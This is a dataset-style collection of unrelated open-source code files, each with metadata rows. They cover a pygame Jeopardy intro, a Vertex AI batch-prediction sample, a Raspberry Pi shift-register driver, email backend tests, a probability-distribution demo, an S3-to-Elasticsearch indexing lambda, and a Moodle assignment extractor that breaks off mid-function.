| gpl-2.0 | -5,251,576,594,172,909,000 | 45.888889 | 133 | 0.598697 | false |
spadgenske/Jeopardy | jeoparpy/ui/intro.py | 1 | 6128 | """
intro.py
DESCRIPTION:
Functions implementing the beginning of the JeoparPy introduction sequence.
Intro music plays, the title fades in over a background, and the subtitle
appears. Upon pressing any key, the rules screen appears. Pressing a key
again ends the sequence.
USAGE:
Main should only need to call do_intro.
Copyright (C) 2013 Adam Beagle - All Rights Reserved
You may use, distribute, and modify this code under
the terms of the GNU General Public License,
viewable at http://opensource.org/licenses/GPL-3.0
This copyright notice must be retained with any use
of source code from this file..
"""
import pygame
from pygame.locals import KEYDOWN, QUIT
from constants import JEOP_BLUE, RULES, SUBTITLE
from resmaps import FONTS, IMAGES
from util import (draw_centered_textblock, draw_textline, restrict_fontsize,
scale, shadow_text, wait_for_keypress)
###############################################################################
def do_intro(screen, clock, audioplayer):
"""
Draw JeoparPy title animation to screen.
Note control of application passed completely to this function from main.
"""
# Declarations
scrSize = screen.get_size()
bannerColor = (0, 0, 50)
music = audioplayer.sounds['intro']
background, bgRect = _build_background(scrSize)
background.blit(*_build_banner(bgRect, bannerColor))
rules, rulesRect = _build_rules(bgRect)
title, titleRect = _build_title_text(bgRect, bannerColor)
# Start intro sequence
pygame.event.set_allowed(None)
screen.blit(background, (0, 0))
pygame.display.update()
music.play()
# Fade in title (control passed to function)
_fade_in_title(screen, background, title, titleRect, bannerColor, clock)
# Draw subtitle and wait for keypress
_blit_subtitle(background, bgRect, titleRect)
pygame.event.set_allowed([KEYDOWN, QUIT])
_update_and_wait_for_keypress(screen, background)
# Draw rules and wait for keypress
music.set_volume(0.7)
background.blit(rules, rulesRect)
_update_and_wait_for_keypress(screen, background)
music.fadeout(1000)
pygame.time.delay(1000)
###############################################################################
def _update_and_wait_for_keypress(screen, background):
screen.blit(background, (0, 0))
pygame.display.update()
wait_for_keypress()
def _blit_subtitle(background, scrRect, titleRect):
"""
Creates subtitle and its shadow, then blits both onto background.
'scrRect' is Rect the size of entire screen.
'titleRect' is Rect of title text.
"""
# Render subtitle text
size = int(52 * (scrRect.h / 768.0))
offset = int(20 * (scrRect.h / 768.0))
font = pygame.font.Font(FONTS['subtitle'], size)
text = font.render(SUBTITLE, 1, (255, 255, 255))
# Position subtitle
rect = text.get_rect()
rect.centerx = scrRect.centerx
rect.y = titleRect.bottom + offset
# Create shadow
shadow, shadRect = shadow_text(SUBTITLE, rect, font, 2)
# Blit both to background
background.blit(shadow, shadRect)
background.blit(text, rect)
def _build_background(scrSize):
background = pygame.image.load(IMAGES['introBG']).convert()
background = pygame.transform.scale(background, scrSize)
return background, background.get_rect()
def _build_banner(scrRect, color):
"""
Return 2-tuple containing title banner surface and its Rect,
already positioned to be drawn.
Arguments are a pygame.Rect object the size of the screen, and the
color of the banner.
"""
size = (scrRect.w, scale(175, scrRect.h, 768))
banner = pygame.Surface(size)
banner.fill(color)
rect = banner.get_rect()
rect.centery = scrRect.centery
return (banner, rect)
def _build_rules(scrRect):
"""Return tuple of fully drawn rules surface and its rect."""
header = '--RULES--'
offset = scale(50, scrRect.h, 768)
rect = scrRect.copy()
rect.inflate_ip(-offset, -offset)
sfc = pygame.Surface(rect.size)
font = pygame.font.Font(FONTS['rules'], scale(80, scrRect.h, 768))
# Draw header
sfc.fill(JEOP_BLUE)
headerRect = pygame.Rect((0, int(.05*rect.h)), font.size(header))
headerRect.centerx = rect.centerx
draw_textline(sfc, header, font, (255, 255, 255),
headerRect, scale(6, scrRect.h, 768))
# Draw rules
bounds = tuple(.9*x for x in scrRect.size)
fsize = restrict_fontsize(FONTS['rules'], scale(50, scrRect.h, 768),
RULES, bounds)
font = pygame.font.Font(FONTS['rules'], fsize)
draw_centered_textblock(sfc, RULES, font, (255, 255, 255), 0,
scale(4, scrRect.h, 768), False)
sfc.set_alpha(240)
return sfc, rect
def _build_title_text(scrRect, bgColor):
"""
Return 2-tuple containing title text surface and its Rect, already
positioned to be drawn.
Arguments are a pygame.Rect object the size of the screen,
and the background color of the text.
"""
size = int(150 * (scrRect.h / 768.0))
font = pygame.font.Font(FONTS['title'], size)
# Note: bgColor required so set_alpha can be called on text.
text = font.render("JeoparPy!", 1, (230, 230, 230), bgColor)
rect = text.get_rect()
rect.center = scrRect.center
return (text, rect)
def _fade_in_title(screen, background, text, textRect, bannerColor, clock):
fpsGoal = int(255 / 7.8) #frames to draw / time to spend in secs
pygame.time.delay(2000)
for alpha in xrange(256):
background.fill(bannerColor, textRect)
text.set_alpha(alpha)
background.blit(text, textRect)
screen.blit(background, textRect, textRect)
pygame.display.update(textRect)
clock.tick_busy_loop(fpsGoal)
###############################################################################
if __name__ == '__main__':
#Test run
pygame.init()
screen = pygame.display.set_mode((800, 450))
clock = pygame.time.Clock()
screen.fill((0, 0, 0))
do_intro(screen, clock)
| gpl-3.0 | 8,658,366,588,429,702,000 | 31.595745 | 79 | 0.641155 | false |
googleapis/python-aiplatform | .sample_configs/param_handlers/create_batch_prediction_job_custom_image_explain_sample.py | 1 | 2027 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def make_parent(parent: str) -> str:
parent = parent
return parent
def make_batch_prediction_job(display_name: str, model_name: str, instances_format: str, gcs_source_uri: str, predictions_format: str, gcs_destination_output_uri_prefix: str) -> google.cloud.aiplatform_v1alpha1.types.batch_prediction_job.BatchPredictionJob:
model_parameters_dict = {}
model_parameters = to_protobuf_value(model_parameters_dict)
batch_prediction_job = {
'display_name': display_name,
# Format: 'projects/{project}/locations/{location}/models/{model_id}'
'model': model_name,
'model_parameters': model_parameters,
'input_config': {
'instances_format': instances_format,
'gcs_source': {
'uris': [gcs_source_uri]
},
},
'output_config': {
'predictions_format': predictions_format,
'gcs_destination': {
'output_uri_prefix': gcs_destination_output_uri_prefix
},
},
'dedicated_resources': {
'machine_spec': {
'machine_type': 'n1-standard-2',
'accelerator_type': aiplatform.gapic.AcceleratorType.NVIDIA_TESLA_K80,
'accelerator_count': 1
},
'starting_replica_count': 1,
'max_replica_count': 1
},
'generate_explanation': True
}
return batch_prediction_job
| apache-2.0 | 726,643,331,524,627,700 | 35.854545 | 257 | 0.629995 | false |
spoonysonny/SAKS-tutorials | chengying/entities/ic_74hc595.py | 1 | 2361 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 NXEZ.COM.
# http://www.nxez.com
#
# Licensed under the GNU General Public License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.gnu.org/licenses/gpl-2.0.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Spoony'
__version__ = 'version 0.0.1'
__license__ = 'Copyright (c) 2016 NXEZ.COM'
import RPi.GPIO as GPIO
import time
class IC_74HC595(object):
'''
IC_74HC595 class
'''
__pins = {'ds':0, 'shcp':0, 'stcp':0}
__real_true = GPIO.HIGH
__data = 0x00
def __init__(self, pins, real_true = GPIO.HIGH):
'''
Init the ic
:param pin: pin number
:param real_true: GPIO.HIGH or GPIO.LOW
:return: void
'''
self.__pins = pins
self.__real_true = real_true
#Stauts.
@property
def data(self):
'''
Return the data
:return: void
'''
return self.__data
#Verbs.
def flush_shcp(self):
'''
Flush a shcp
:return: void
'''
GPIO.output(self.__pins['shcp'], not self.__real_true)
GPIO.output(self.__pins['shcp'], self.__real_true)
def flush_stcp(self):
'''
Flush a stcp
:return: void
'''
GPIO.output(self.__pins['stcp'], not self.__real_true)
GPIO.output(self.__pins['stcp'], self.__real_true)
def set_bit(self, bit):
'''
Set a bit
:param bit: bit
:return: void
'''
GPIO.output(self.__pins['ds'], bit)
self.flush_shcp()
def set_data(self, data):
'''
Set a byte
:param data: data
:return: void
'''
self.__data = data
for i in range (0, 8):
self.set_bit((self.__data >> i) & 0x01)
self.flush_stcp()
def clear(self):
'''
Clear the data
:return: void
'''
self.set_data(0x00)
| gpl-2.0 | 7,145,231,907,859,546,000 | 23.340206 | 77 | 0.547649 | false |
Yelp/love | tests/logic/email_test.py | 1 | 1380 | # -*- coding: utf-8 -*-
import mock
import unittest
import logic.email
class EmailTest(unittest.TestCase):
"""We really just want to test that configuration is honored here."""
sender = '[email protected]'
recipient = '[email protected]'
subject = 'test subject'
html = '<p>hello test</p>'
text = 'hello test'
@mock.patch('logic.email.EMAIL_BACKENDS')
@mock.patch('logic.email.config')
def test_send_email_appengine(self, mock_config, mock_backends):
mock_config.EMAIL_BACKEND = 'appengine'
mock_backends['appengine'] = mock.Mock()
logic.email.send_email(self.sender, self.recipient, self.subject,
self.html, self.text)
mock_backends['appengine'].assert_called_once_with(
self.sender, self.recipient, self.subject, self.html, self.text
)
@mock.patch('logic.email.EMAIL_BACKENDS')
@mock.patch('logic.email.config')
def test_send_email_sendgrid(self, mock_config, mock_backends):
mock_config.EMAIL_BACKEND = 'sendgrid'
mock_backends['sendgrid'] = mock.Mock()
logic.email.send_email(self.sender, self.recipient, self.subject,
self.html, self.text)
mock_backends['sendgrid'].assert_called_once_with(
self.sender, self.recipient, self.subject, self.html, self.text
)
| mit | -5,685,770,015,636,197,000 | 36.297297 | 75 | 0.632609 | false |
dkasak/pacal | pacal/examples/singularities.py | 1 | 2567 | #!===================================================================
#! Examples of distributions with singularities
#!===================================================================
from functools import partial
from pylab import *
from mpl_toolkits.axes_grid.inset_locator import zoomed_inset_axes
from mpl_toolkits.axes_grid.inset_locator import mark_inset
from pacal import *
from pacal.distr import demo_distr
if __name__ == "__main__":
#!-------------------------------------------
#! Product of two shifted normal variables
#!-------------------------------------------
#! such a product always has a singularity at 0, but the further the factors' means are from zero, the 'lighter' the singularity becomes
figure()
d = NormalDistr(0,1) * NormalDistr(0,1)
demo_distr(d, ymax=1.5, xmin=-5, xmax=5)
#show()
figure()
d = NormalDistr(1,1) * NormalDistr(1,1)
demo_distr(d)
#show()
figure()
d = NormalDistr(2,1) * NormalDistr(2,1)
demo_distr(d)
#show()
figure()
d = NormalDistr(3,1) * NormalDistr(3,1)
d.plot()
d.hist()
ax=gca()
axins = zoomed_inset_axes(ax, 6, loc=1)
d.plot(xmin=-1.5, xmax=1.5)
axins.set_xlim(-1.5, 1.5)
xticks(rotation="vertical")
axins.set_ylim(0, 0.01)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
#show()
figure()
d = NormalDistr(4,1) * NormalDistr(4,1)
d.plot()
d.hist()
ax=gca()
axins = zoomed_inset_axes(ax, 12000, loc=1)
d.plot(xmin=-.001, xmax=.001)
axins.set_xlim(-.001, .001)
xticks(rotation="vertical")
axins.set_ylim(0.000072, 0.000075)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
#show()
# demo_distr(UniformDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1) * NormalDistr(0,1)* NormalDistr(0,1) * NormalDistr(0,1))
#!-------------------------------------------
#! Product of six uniform distributions
#!-------------------------------------------
def prod_uni_pdf(n, x):
pdf = (-log(x)) ** (n-1)
for i in xrange(2, n):
pdf /= i
return pdf
figure()
d = UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1)
demo_distr(d, ymax=100, xmin=-0.01, xmax=0.3, theoretical = partial(prod_uni_pdf, 6))
#show()
# figure()
# demo_distr(UniformDistr(0,1.1) * UniformDistr(0,1.1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1) * UniformDistr(0,1))
show()
| gpl-3.0 | -4,821,428,241,829,560,000 | 31.493671 | 150 | 0.534086 | false |
quiltdata/quilt-compiler | lambdas/es/indexer/index.py | 1 | 23450 | """
send documents representing object data to elasticsearch for supported file extensions.
note: we truncate outbound documents to DOC_SIZE_LIMIT characters
(to bound memory pressure and request size to elastic)
a little knowledge on deletes and delete markers:
if bucket versioning is on:
- `aws s3api delete-object (no --version-id)` or `aws s3 rm`
- push a new delete marker onto the stack with a version-id
- generate ObjectRemoved:DeleteMarkerCreated
if bucket versioning was on and is then turned off:
- `aws s3 rm` or `aws s3api delete-object (no --version-id)`
- replace event at top of stack
- if a versioned delete marker, push a new one on top of it
- if an un-versioned delete marker, replace that marker with new marker
with version "null" (ObjectCreate will similarly replace the same with an object
of version "null")
- if object, destroy object
- generate ObjectRemoved:DeleteMarkerCreated
- problem: no way of knowing if DeleteMarkerCreated destroyed bytes
or just created a DeleteMarker; this is usually given by the return
value of `delete-object` but the S3 event has no knowledge of the same
- `aws s3api delete-object --version-id VERSION`
- destroy corresponding delete marker or object; v may be null in which
case it will destroy the object with version null (occurs when adding
new objects to a bucket that aws versioned but is no longer)
- generate ObjectRemoved:Deleted
if bucket version is off and has always been off:
- `aws s3 rm` or `aws s3api delete-object`
- destroy object
- generate a single ObjectRemoved:Deleted
counterintuitive things:
- turning off versioning doesn't mean version stack can't get deeper (by at
least 1) as indicated above in the case where a new marker is pushed onto
the version stack
"""
import datetime
import json
from typing import Optional
import pathlib
import re
from os.path import split
from urllib.parse import unquote, unquote_plus
import boto3
import botocore
import nbformat
from tenacity import retry, retry_if_exception, stop_after_attempt, wait_exponential
from t4_lambda_shared.preview import (
ELASTIC_LIMIT_BYTES,
ELASTIC_LIMIT_LINES,
extract_fcs,
extract_parquet,
get_bytes,
get_preview_lines,
trim_to_bytes
)
from t4_lambda_shared.utils import (
get_available_memory,
get_quilt_logger,
MANIFEST_PREFIX_V1,
POINTER_PREFIX_V1,
query_manifest_content,
separated_env_to_iter,
)
from document_queue import (
DocTypes,
DocumentQueue,
CONTENT_INDEX_EXTS,
EVENT_PREFIX,
MAX_RETRY
)
# 10 MB, see https://amzn.to/2xJpngN
NB_VERSION = 4 # default notebook version for nbformat
# currently only affects .parquet, TODO: extend to other extensions
SKIP_ROWS_EXTS = separated_env_to_iter('SKIP_ROWS_EXTS')
SELECT_PACKAGE_META = "SELECT * from S3Object o WHERE o.version IS NOT MISSING LIMIT 1"
# No WHERE clause needed for aggregations since S3 Select skips missing fields for aggs
SELECT_PACKAGE_STATS = "SELECT SUM(obj['size']) as total_bytes, COUNT(obj['size']) as total_files from S3Object obj"
TEST_EVENT = "s3:TestEvent"
# we need to filter out GetObject and HeadObject calls generated by the present
# lambda in order to display accurate analytics in the Quilt catalog
# a custom user agent enables said filtration
USER_AGENT_EXTRA = " quilt3-lambdas-es-indexer"
def now_like_boto3():
"""ensure timezone UTC for consistency with boto3:
Example of what boto3 returns on head_object:
'LastModified': datetime.datetime(2019, 11, 6, 3, 1, 16, tzinfo=tzutc()),
"""
return datetime.datetime.now(tz=datetime.timezone.utc)
def should_retry_exception(exception):
"""don't retry certain 40X errors"""
if hasattr(exception, 'response'):
error_code = exception.response.get('Error', {}).get('Code', 218)
return error_code not in ["402", "403", "404"]
return False
def infer_extensions(key, ext):
"""guess extensions if possible"""
# Handle special case of hive partitions
# see https://www.qubole.com/blog/direct-writes-to-increase-spark-performance/
if (
re.fullmatch(r".c\d{3,5}", ext) or re.fullmatch(r".*-c\d{3,5}$", key)
or key.endswith("_0")
or ext == ".pq"
):
return ".parquet"
return ext
@retry(
stop=stop_after_attempt(MAX_RETRY),
wait=wait_exponential(multiplier=2, min=4, max=30),
retry=(retry_if_exception(should_retry_exception))
)
def select_manifest_meta(s3_client, bucket: str, key: str):
"""
wrapper for retry and returning a string
"""
try:
raw = query_manifest_content(
s3_client,
bucket=bucket,
key=key,
sql_stmt=SELECT_PACKAGE_META
)
return raw.read()
except botocore.exceptions.ClientError as cle:
print(f"Unable to S3 select manifest: {cle}")
return None
def index_if_manifest(
s3_client,
doc_queue: DocumentQueue,
event_type: str,
*,
bucket: str,
etag: str,
ext: str,
key: str,
last_modified: str,
version_id: Optional[str],
size: int
) -> bool:
"""index manifest files as package documents in ES
Returns:
- True if manifest (and passes to doc_queue for indexing)
- False if not a manifest (no attempt at indexing)
"""
logger_ = get_quilt_logger()
pointer_prefix, pointer_file = split(key)
handle = pointer_prefix[len(POINTER_PREFIX_V1):]
if (
not pointer_prefix.startswith(POINTER_PREFIX_V1)
or len(handle) < 3
or '/' not in handle
):
logger_.debug("Not indexing as manifest file s3://%s/%s", bucket, key)
return False
try:
manifest_timestamp = int(pointer_file)
except ValueError as err:
logger_.debug("Non-integer manifest pointer: s3://%s/%s, %s", bucket, key, err)
# this is probably the latest pointer, skip it. manifest already indexed.
return False
else:
if not 1451631600 <= manifest_timestamp <= 1767250800:
logger_.warning("Unexpected manifest timestamp s3://%s/%s", bucket, key)
return False
package_hash = get_plain_text(
bucket,
key,
size,
None,
etag=etag,
s3_client=s3_client,
version_id=version_id,
).strip()
manifest_key = f"{MANIFEST_PREFIX_V1}{package_hash}"
first = select_manifest_meta(s3_client, bucket, manifest_key)
stats = select_package_stats(s3_client, bucket, manifest_key)
if not first:
logger_.error("S3 select failed %s %s", bucket, manifest_key)
return False
try:
first_dict = json.loads(first)
doc_queue.append(
event_type,
DocTypes.PACKAGE,
bucket=bucket,
etag=etag,
ext=ext,
handle=handle,
key=manifest_key,
last_modified=last_modified,
package_hash=package_hash,
package_stats=stats,
pointer_file=pointer_file,
comment=str(first_dict.get("message", "")),
metadata=json.dumps(first_dict.get("user_meta", {})),
)
return True
except (json.JSONDecodeError, botocore.exceptions.ClientError) as exc:
print(
f"{exc}\n"
f"\tFailed to select first line of manifest s3://{bucket}/{key}."
f"\tGot {first}."
)
return False
def select_package_stats(s3_client, bucket, manifest_key) -> str:
"""use s3 select to generate file stats for package"""
logger_ = get_quilt_logger()
try:
raw_stats = query_manifest_content(
s3_client,
bucket=bucket,
key=manifest_key,
sql_stmt=SELECT_PACKAGE_STATS
).read()
stats = json.loads(raw_stats)
assert isinstance(stats['total_bytes'], int)
assert isinstance(stats['total_files'], int)
return stats
except (botocore.exceptions.ClientError, AssertionError, KeyError) as err:
logger_.error("Unable to compute package status via S3 select: %s", err)
return None
def maybe_get_contents(bucket, key, ext, *, etag, version_id, s3_client, size):
"""get the byte contents of a file if it's a target for deep indexing"""
if ext.endswith('.gz'):
compression = 'gz'
ext = ext[:-len('.gz')]
else:
compression = None
content = ""
inferred_ext = infer_extensions(key, ext)
if inferred_ext in CONTENT_INDEX_EXTS:
if inferred_ext == ".fcs":
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
body, info = extract_fcs(get_bytes(obj["Body"], compression), as_html=False)
# be smart and just send column names to ES (instead of bloated full schema)
# if this is not an HTML/catalog preview
content = trim_to_bytes(f"{body}\n{info}", ELASTIC_LIMIT_BYTES)
if inferred_ext == ".ipynb":
content = trim_to_bytes(
# we have no choice but to fetch the entire notebook, because we
# are going to parse it
# warning: huge notebooks could spike memory here
get_notebook_cells(
bucket,
key,
size,
compression,
etag=etag,
s3_client=s3_client,
version_id=version_id
),
ELASTIC_LIMIT_BYTES
)
elif inferred_ext == ".parquet":
if size >= get_available_memory():
print(f"{bucket}/{key} too large to deserialize; skipping contents")
# at least index the key and other stats, but don't overrun memory
# and fail indexing altogether
return ""
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
body, info = extract_parquet(
get_bytes(obj["Body"], compression),
as_html=False,
skip_rows=(inferred_ext in SKIP_ROWS_EXTS)
)
# be smart and just send column names to ES (instead of bloated full schema)
# if this is not an HTML/catalog preview
columns = ','.join(list(info['schema']['names']))
content = trim_to_bytes(f"{columns}\n{body}", ELASTIC_LIMIT_BYTES)
else:
content = get_plain_text(
bucket,
key,
size,
compression,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
return content
def extract_text(notebook_str):
""" Extract code and markdown
Args:
* nb - notebook as a string
Returns:
* str - select code and markdown source (and outputs)
Pre:
* notebook is well-formed per notebook version 4
* "cell_type" is defined for all cells
* "source" defined for all "code" and "markdown" cells
Throws:
* Anything nbformat.reads() can throw :( which is diverse and poorly
documented, hence the `except Exception` in handler()
Notes:
* Deliberately decided not to index output streams and display strings
because they were noisy and low value
* Tested this code against ~6400 Jupyter notebooks in
s3://alpha-quilt-storage/tree/notebook-search/
* Might be useful to index "cell_type" : "raw" in the future
See also:
* Format reference https://nbformat.readthedocs.io/en/latest/format_description.html
"""
formatted = nbformat.reads(notebook_str, as_version=NB_VERSION)
text = []
for cell in formatted.get("cells", []):
if "source" in cell and cell.get("cell_type") in ("code", "markdown"):
text.append(cell["source"])
return "\n".join(text)
def get_notebook_cells(bucket, key, size, compression, *, etag, s3_client, version_id):
"""extract cells for ipynb notebooks for indexing"""
text = ""
try:
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
version_id=version_id
)
data = get_bytes(obj["Body"], compression)
notebook = data.getvalue().decode("utf-8")
try:
text = extract_text(notebook)
except (json.JSONDecodeError, nbformat.reader.NotJSONError):
print(f"Invalid JSON in {key}.")
except (KeyError, AttributeError) as err:
print(f"Missing key in {key}: {err}")
# there might be more errors than covered by test_read_notebook
# better not to fail altogether
except Exception as exc: # pylint: disable=broad-except
print(f"Exception in file {key}: {exc}")
except UnicodeDecodeError as uni:
print(f"Unicode decode error in {key}: {uni}")
return text
def get_plain_text(
bucket,
key,
size,
compression,
*,
etag,
s3_client,
version_id
) -> str:
"""get plain text object contents"""
text = ""
try:
obj = retry_s3(
"get",
bucket,
key,
size,
etag=etag,
s3_client=s3_client,
limit=ELASTIC_LIMIT_BYTES,
version_id=version_id
)
lines = get_preview_lines(
obj["Body"],
compression,
ELASTIC_LIMIT_LINES,
ELASTIC_LIMIT_BYTES
)
text = '\n'.join(lines)
except UnicodeDecodeError as ex:
print(f"Unicode decode error in {key}", ex)
return text
def make_s3_client():
"""make a client with a custom user agent string so that we can
filter the present lambda's requests to S3 from object analytics"""
configuration = botocore.config.Config(user_agent_extra=USER_AGENT_EXTRA)
return boto3.client("s3", config=configuration)
def handler(event, context):
"""enumerate S3 keys in event, extract relevant data, queue events, send to
elastic via bulk() API
"""
logger_ = get_quilt_logger()
# message is a proper SQS message, which either contains a single event
# (from the bucket notification system) or batch-many events as determined
# by enterprise/**/bulk_loader.py
# An exception that we'll want to re-raise after the batch sends
content_exception = None
for message in event["Records"]:
body = json.loads(message["body"])
body_message = json.loads(body["Message"])
if "Records" not in body_message:
if body_message.get("Event") == TEST_EVENT:
logger_.debug("Skipping S3 Test Event")
# Consume and ignore this event, which is an initial message from
# SQS; see https://forums.aws.amazon.com/thread.jspa?threadID=84331
continue
print("Unexpected message['body']. No 'Records' key.", message)
raise Exception("Unexpected message['body']. No 'Records' key.")
batch_processor = DocumentQueue(context)
events = body_message.get("Records", [])
s3_client = make_s3_client()
# event is a single S3 event
for event_ in events:
logger_.debug("Processing %s", event_)
try:
event_name = event_["eventName"]
# Process all Create:* and Remove:* events
if not any(event_name.startswith(n) for n in EVENT_PREFIX.values()):
continue
bucket = unquote(event_["s3"]["bucket"]["name"])
# In the grand tradition of IE6, S3 events turn spaces into '+'
key = unquote_plus(event_["s3"]["object"]["key"])
version_id = event_["s3"]["object"].get("versionId")
version_id = unquote(version_id) if version_id else None
# Skip delete markers when versioning is on
if version_id and event_name == "ObjectRemoved:DeleteMarkerCreated":
continue
# ObjectRemoved:Delete does not include "eTag"
etag = unquote(event_["s3"]["object"].get("eTag", ""))
# Get two levels of extensions to handle files like .csv.gz
path = pathlib.PurePosixPath(key)
ext1 = path.suffix
ext2 = path.with_suffix('').suffix
ext = (ext2 + ext1).lower()
# Handle delete first and then continue so that
# head_object and get_object (below) don't fail
if event_name.startswith(EVENT_PREFIX["Removed"]):
logger_.debug("Object delete to queue")
batch_processor.append(
event_name,
DocTypes.OBJECT,
bucket=bucket,
ext=ext,
etag=etag,
key=key,
last_modified=now_like_boto3(),
text="",
version_id=version_id
)
continue
try:
logger_.debug("Get object head")
head = retry_s3(
"head",
bucket,
key,
s3_client=s3_client,
version_id=version_id,
etag=etag
)
except botocore.exceptions.ClientError as first:
logger_.warning("head_object error: %s", first)
# "null" version sometimes results in 403s for buckets
# that have changed versioning, retry without it
if (first.response.get('Error', {}).get('Code') == "403"
and version_id == "null"):
try:
head = retry_s3(
"head",
bucket,
key,
s3_client=s3_client,
version_id=None,
etag=etag
)
except botocore.exceptions.ClientError as second:
# this will bypass the DLQ but that's the right thing to do
# as some listed objects may NEVER succeed head requests
# (e.g. foreign owner) and there's no reason to torpedo
# the whole batch (which might include good files)
logger_.warning("Retried head_object error: %s", second)
logger_.error("Fatal head_object, skipping event: %s", event_)
continue
size = head["ContentLength"]
last_modified = head["LastModified"]
did_index = index_if_manifest(
s3_client,
batch_processor,
event_name,
bucket=bucket,
etag=etag,
ext=ext,
key=key,
last_modified=last_modified,
size=size,
version_id=version_id
)
logger_.debug("Logged as manifest? %s", did_index)
try:
text = maybe_get_contents(
bucket,
key,
ext,
etag=etag,
version_id=version_id,
s3_client=s3_client,
size=size
)
# we still want an entry for this document in elastic so that, e.g.,
# the file counts from elastic are correct. re-raise below.
except Exception as exc: # pylint: disable=broad-except
text = ""
content_exception = exc
logger_.error("Content extraction failed %s %s %s", bucket, key, exc)
batch_processor.append(
event_name,
DocTypes.OBJECT,
bucket=bucket,
key=key,
ext=ext,
etag=etag,
version_id=version_id,
last_modified=last_modified,
size=size,
text=text
)
except botocore.exceptions.ClientError as boto_exc:
if not should_retry_exception(boto_exc):
logger_.warning("Got exception but retrying: %s", boto_exc)
continue
logger_.critical("Failed record: %s, %s", event, boto_exc)
raise boto_exc
# flush the queue
batch_processor.send_all()
# note: if there are multiple content exceptions in the batch, this will
# only raise the most recent one;
# re-raise so that get_contents() failures end up in the DLQ
if content_exception:
logger_.critical("Failed batch due to %s", content_exception)
raise content_exception
def retry_s3(
operation,
bucket,
key,
size=None,
limit=None,
*,
etag,
version_id,
s3_client
):
"""retry head or get operation to S3 with; stop before we run out of time.
retry is necessary since, due to eventual consistency, we may not
always get the required version of the object.
"""
if operation == "head":
function_ = s3_client.head_object
elif operation == "get":
function_ = s3_client.get_object
else:
raise ValueError(f"unexpected operation: {operation}")
# Keyword arguments to function_
arguments = {
"Bucket": bucket,
"Key": key
}
if operation == 'get' and size and limit:
# can only request range if file is not empty
arguments['Range'] = f"bytes=0-{min(size, limit)}"
if version_id:
arguments['VersionId'] = version_id
else:
arguments['IfMatch'] = etag
@retry(
# debug
reraise=True,
stop=stop_after_attempt(MAX_RETRY),
wait=wait_exponential(multiplier=2, min=4, max=30),
retry=(retry_if_exception(should_retry_exception))
)
def call():
"""local function so we can set stop_after_delay dynamically"""
# TODO: remove all this, stop_after_delay is not dynamically loaded anymore
return function_(**arguments)
return call()
| apache-2.0 | -3,470,820,596,382,642,000 | 35.356589 | 116 | 0.553817 | false |
ocdude/mbzextract | mbzextract/plugins/assignment/assignment.py | 1 | 8744 | import os
import xml.etree.ElementTree as et
import html
from datetime import datetime
from jinja2 import Environment, PackageLoader
class moodle_module:
def __init__(self, **kwargs):
self.backup = kwargs['backup']
self.temp_dir = kwargs['temp_dir']
self.db = kwargs['db']
self.directory = kwargs['directory']
self.final_dir = kwargs['working_dir']
self.db_cursor = self.db.cursor()
# create table for this activity
query = 'CREATE TABLE IF NOT EXISTS assignments (activityid int PRIMARY KEY,moduleid int,contextid int,name text,intro text,assignmenttype text)'
self.db_cursor.execute(query)
if kwargs['student_data'] == True:
# create table for the submissions to the assignments
query = 'CREATE TABLE IF NOT EXISTS assignment_submissions (submissionid int PRIMARY KEY,activityid int,userid int,timecreated int,timemodified int,data text,grade real,comment text,teacher int,timemarked int)'
self.db_cursor.execute(query)
self.student_data = kwargs['student_data']
else:
self.student_data = False
# commit the changes
self.db.commit()
self.env = Environment(loader=PackageLoader(
'mbzextract.plugins.assignment', 'templates'))
def parse(self):
"""Parse the assignment.xml and inforef.xml files to get the details
for the assignment and any files associated with it."""
assignment_xml = et.parse(self.backup.open(
self.directory + "/assignment.xml")).getroot()
inforef_xml = et.parse(self.backup.open(
self.directory + "/inforef.xml")).getroot()
# add assignments to the database
assignment = (assignment_xml.get('id'),
assignment_xml.get('moduleid'),
assignment_xml.get('contextid'),
assignment_xml.find('./assignment/name').text,
html.unescape(assignment_xml.find(
'./assignment/intro').text),
assignment_xml.find('./assignment/assignmenttype').text)
self.db_cursor.execute(
'INSERT INTO assignments VALUES(?,?,?,?,?,?)', assignment)
self.current_id = assignment_xml.get('id')
# check to see if the backup file has student data in it
if self.student_data == True:
for submission in assignment_xml.findall('./assignment/submissions/submission'):
entry = (submission.get('id'),
assignment_xml.get('id'),
submission.find('userid').text,
submission.find('timecreated').text,
submission.find('timemodified').text,
submission.find('data1').text,
submission.find('grade').text,
submission.find('submissioncomment').text,
submission.find('teacher').text,
submission.find('timemarked').text)
self.db_cursor.execute(
'INSERT INTO assignment_submissions VALUES(?,?,?,?,?,?,?,?,?,?)', entry)
self.files = self.backup.list_files(inforef_xml, self.db_cursor)
# commit all changes to db
self.db.commit()
def extract(self):
self.db_cursor.execute(
'SELECT * FROM assignments WHERE activityid=?', (self.current_id,))
results = self.db_cursor.fetchone()
path = os.path.join(self.final_dir, self.backup.stripped(results[3]))
if os.path.exists(path) == False:
os.makedirs(path)
os.chdir(path)
if self.student_data == True:
self.db_cursor.execute(
